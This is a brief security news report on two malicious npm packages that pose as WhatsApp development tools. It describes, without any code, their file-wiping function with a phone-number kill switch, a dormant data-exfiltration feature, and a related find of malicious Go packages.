Two malicious NPM packages masquerading as WhatsApp development tools have been uncovered by researchers at Socket, deploying destructive data-wiping code aimed at developers’ computers. The packages, named naya-flore and nvlore-hsc, have reportedly been downloaded over 1,100 times since their release last month.
Despite actions taken by Socket, including filing takedown requests and flagging the publisher ‘nayflore’, the malicious packages remain available in the NPM registry. The packages replicate legitimate WhatsApp libraries used for building automation tools around the WhatsApp Business API, now experiencing increased popularity as more businesses adopt WhatsApp’s Cloud API for communication.
Both packages contain a harmful function named ‘requestPairingCode’ that supposedly manages WhatsApp pairing but downloads a base64 JSON file listing Indonesian phone numbers serving as a ‘kill switch’ to prevent the operator from being affected. However, for all other users, the code executes a command that recursively deletes all files in the current directory, effectively wiping the developer’s system. These findings emphasize the urgency for developers to verify their dependency sources.
Furthermore, Socket found a dormant data exfiltration feature in both packages. Although currently disabled, this feature could potentially extract personal information such as the user’s phone number and device ID if activated. This incident is part of a broader pattern of security threats observed in the software development community. Additionally, Socket reported discovering 11 malicious Go packages that use obfuscation to silently execute harmful scripts on developers’ systems, thus reinforcing the need for caution when sourcing development libraries.